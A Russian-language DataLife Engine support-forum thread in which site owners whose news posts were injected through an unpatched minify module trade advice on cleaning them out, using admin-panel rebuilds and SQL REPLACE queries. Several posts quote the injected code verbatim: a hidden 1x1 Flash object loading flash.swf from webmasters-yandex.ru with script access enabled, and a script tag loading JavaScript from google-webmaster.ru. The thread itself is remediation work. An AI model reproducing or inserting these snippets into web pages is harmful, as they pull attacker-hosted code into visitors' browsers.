CMS DataLife Engine - Система управления сайтами

Sign in to follow this  
Stepller

C 6 сентября все страницы оказались с java-скриптом

Recommended Posts

Здравствуйте. Также во всех новостях вчера появился код:

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?704497470" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?106593817" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>
В конце также стоял js, его убрал с помощью перестроений (спасибо админам за чудесный совет), а вот object classid через поиск и замену.. Да, я пропустил это обновление: http://dle-news.ru/b...ule-minify.html Сейчас и на др. сайте поменять нужно. Так что исправляйте народ, благо делается это быстро :)
Расскажи как чудесным образом это делать быстро
qpool, У вас JS скрипт. Читайте внимательно, что я писал выше. Для удаления JS скриптов никаких запросов делать не нужно, нужно зайти в админпанель DLE в раздел перестроения публикаций и сделать перестроение новостей. JS скрипты DLE удалит сам при перестроении.
Сделал перестроение публикация, новостей, похожих новостей, но яндекс все равно не пускает говорит вирус 18.09.2013 оставлена заявка на проверку сайта, она займет несколько дней. Теперь ждем когда Яндекс прийдет
RedBaron, Ни один антивирус не показывает что у вас вирус https://www.virustot...sis/1379327281/ кроме яндекса. Возможно яндекс еще не переиндексировал вашу страницу.
Все верно он был в последний раз 17.09.2013 , неохота все сносить и наполнять, хотя всего новосте пока маленько в каких файлах был код

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?704497470" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?106593817" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>

[/code]


сдела запрос к базе

[code] UPDATE `dle_post` SET `short_story`=REPLACE(`short_story`,'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"1\" height=\"1\"><param name=\"movie\" value=\"http://webmasters-yandex.ru/flash.swf?1306492186\" /><param name=\"quality\" value=\"high\" /><param name=\"scale\" value=\"exactfit\" /><param name=\"bgcolor\" value=\"#FFFFFF\" /><param name=\"AllowScriptAccess\" value=\"always\" /><embed src=\"http://webmasters-yandex.ru/flash.swf?672938198\" width=\"1\" height=\"1\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\"></embed></object>','') [/code]

[color=#000000][font=sans-serif]Затронуто 0 строк. ( Запрос занял 0.0013 сек. )[/font][/color]

Edited by Леопард

Share this post


Link to post
Share on other sites

Леопард,

У вас в базе код может быть записан по другому, смотрите как записан код именно в phpMyAdmin и его ставьте в запрос.

Share this post


Link to post
Share on other sites

смотрите как записан код именно в phpMyAdmin

В каких файлах смотреть,

Он вообще как показывается, на сайте в новостях. Базу открыл dle_post

Вообще кода не вижу

нет вижу

full

<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"1\" height=\"1\"><param name=\"movie\" value=\"http://webmasters-yandex.ru/flash.swf?1047040540\" /><param name=\"quality\" value=\"high\" /><param name=\"scale\" value=\"exactfit\" /><param name=\"bgcolor\" value=\"#FFFFFF\" /><param name=\"AllowScriptAccess\" value=\"always\" /><embed src=\"http://webmasters-yandex.ru/flash.swf?338057666\" width=\"1\" height=\"1\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\"></embed></object>
short
<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"1\" height=\"1\"><param name=\"movie\" value=\"http://webmasters-yandex.ru/flash.swf?842079145\" /><param name=\"quality\" value=\"high\" /><param name=\"scale\" value=\"exactfit\" /><param name=\"bgcolor\" value=\"#FFFFFF\" /><param name=\"AllowScriptAccess\" value=\"always\" /><embed src=\"http://webmasters-yandex.ru/flash.swf?286927031\" width=\"1\" height=\"1\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\"></embed></object>[/code]


SQL запрос, так

[code] UPDATE `dle_post` SET `short_story`=REPLACE(`short_story`,'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"1\" height=\"1\"><param name=\"movie\" value=\"http://webmasters-yandex.ru/flash.swf?1047040540\" /><param name=\"quality\" value=\"high\" /><param name=\"scale\" value=\"exactfit\" /><param name=\"bgcolor\" value=\"#FFFFFF\" /><param name=\"AllowScriptAccess\" value=\"always\" /><embed src=\"http://webmasters-yandex.ru/flash.swf?338057666\" width=\"1\" height=\"1\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\"></embed></object>','') [/code]

[color=#000000][font=sans-serif]Затронуто 0 строк. ( Запрос занял 0.0014 сек. )[/font][/color]

Share this post


Link to post
Share on other sites

Леопард,

попробуйте добавить еще один обратный слеш к кавычкам.

Share this post


Link to post
Share on other sites

UPDATE `dle_post` SET `short_story` = REPLACE(`short_story`, '<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"1\" height=\"1\"><param name=\"movie\" value=\"http://webmasters-yandex.ru/flash.swf?1047040540\" /><param name=\"quality\" value=\"high\" /><param name=\"scale\" value=\"exactfit\" /><param name=\"bgcolor\" value=\"#FFFFFF\" /><param name=\"AllowScriptAccess\" value=\"always\" /><embed src=\"http://webmasters-yandex.ru/flash.swf?338057666\" width=\"1\" height=\"1\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\"></embed></object>\', '')

покажите как

Edited by Леопард

Share this post


Link to post
Share on other sites

Там где у вас стоит " замените на " в запросе

Share this post


Link to post
Share on other sites

как мне удалить вредоносный код и базы? у меня база размером 464 мб, никакой из вышеперечисленных методов не помог, код слишком большой и большой размер бд...

Share this post


Link to post
Share on other sites

eargonx,

Когда вы выполняете запросы к БД, размер БД роли не играет, просто вы неверно вводите код который нужно удалить.

Share this post


Link to post
Share on other sites

eargonx,

Когда вы выполняете запросы к БД, размер БД роли не играет, просто вы неверно вводите код который нужно удалить.

копировал текст из phpadmin, после выполнения запроса: Затронуто строк: 1 (запрос занял 0.9822 сек.), получается код разный в каждой новости, у был удален только с одной новости?

Share this post


Link to post
Share on other sites

eargonx,

Какой конкретно код вы удаляете?

Share this post


Link to post
Share on other sites

eargonx,

Какой конкретно код вы удаляете?


<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?1283095054"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="http://webmasters-yandex.ru/flash.swf?100406088" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object><script async="async" type="text/javascript" src="http://google-webmaster.ru/6d893561f45d115164d9577f4d08b54c.js"></script>

Share this post


Link to post
Share on other sites

eargonx,

Вам нужно сначала сделать перестроение новостей в админпанели скрипта, это удалит скрипты JS из новостей, а потом через запросы к БД удалить только теги object

Share this post


Link to post
Share on other sites

Запустил перестроение публикаций: Общее количество новостей: 41503, обработано: 21810 ошибка отправки

Share this post


Link to post
Share on other sites

eargonx,

Кнопка продолжить не помогает? Когда скрипт делает перестроение по сколько новостей скрипт у вас перестраивает за один раз, т.е. на сколько счетчик увеличивается когда идет перестроение?

Share this post


Link to post
Share on other sites

Друзья. У меня такая же проблема. На данный момент понял, что проблема в моем компе. Ранее антивирь угроз не обнаруживал. Сачал тестовый доктор веб и нашлась бяка. Пока начну чистить комп.

Перестроение залипает. Перестраивает по 5. Что делать? Ошибку выдает!

Share this post


Link to post
Share on other sites

eargonx,

Кнопка продолжить не помогает? Когда скрипт делает перестроение по сколько новостей скрипт у вас перестраивает за один раз, т.е. на сколько счетчик увеличивается когда идет перестроение?

кнопка продолжить не помогает, выдает ошибку, перестраивает по 5 новостей, медленно...

Share this post


Link to post
Share on other sites

eargonx,

Зайдите в настройки скрипта и отключите настройку

Автоматическое изменение размера для удаленных изображений

Укажите максимальную ширину картинки для тега , после которой изображение будет пропорционально уменьшено, до указанного размера. Для отключения автоматического уменьшения введите 0.

Установив для нее 0, у вас сейчас она включена, а в каких то ваших новостях есть картинки, где сайт где они расположены не отвечает, соответственно скрипт не может перестроить новость. После отключения данной настройки, перестроение будет идти быстро по 50 новостей. Потом включите опять если вам нужна данная настройка.

Share this post


Link to post
Share on other sites

сделал перестроение всех новостей, после этого остался такой код в новостях:


<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1"><param name="movie" value="http://webmasters-yandex.ru/flash.swf?202293196" /><param name="quality" value="high" /><param name="scale" value="exactfit" /><param name="bgcolor" value="#FFFFFF" /><param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?866894702" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed></object>

через phpmyadmin не получается его удалить целиком...

Share this post


Link to post
Share on other sites

через phpmyadmin не получается его удалить целиком...

Все должно получаться, смотрите точно как записан код к БД, и возможно что кавычки в запросе нужно экранировать я выше писал как это делать.

Share this post


Link to post
Share on other sites

после изменения настройки все-равно зависает на одной и той же новости.

Share this post


Link to post
Share on other sites

RED,

Вы пользуетесь актуальной версией скрипта или нет?

Share this post


Link to post
Share on other sites

да

RED,

Вы пользуетесь актуальной версией скрипта или нет?

Share this post


Link to post
Share on other sites

RED,

Не должно быть никаких зависаний. Тут нужно смотреть непосредственно на вашем в чем там у вас проблема.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this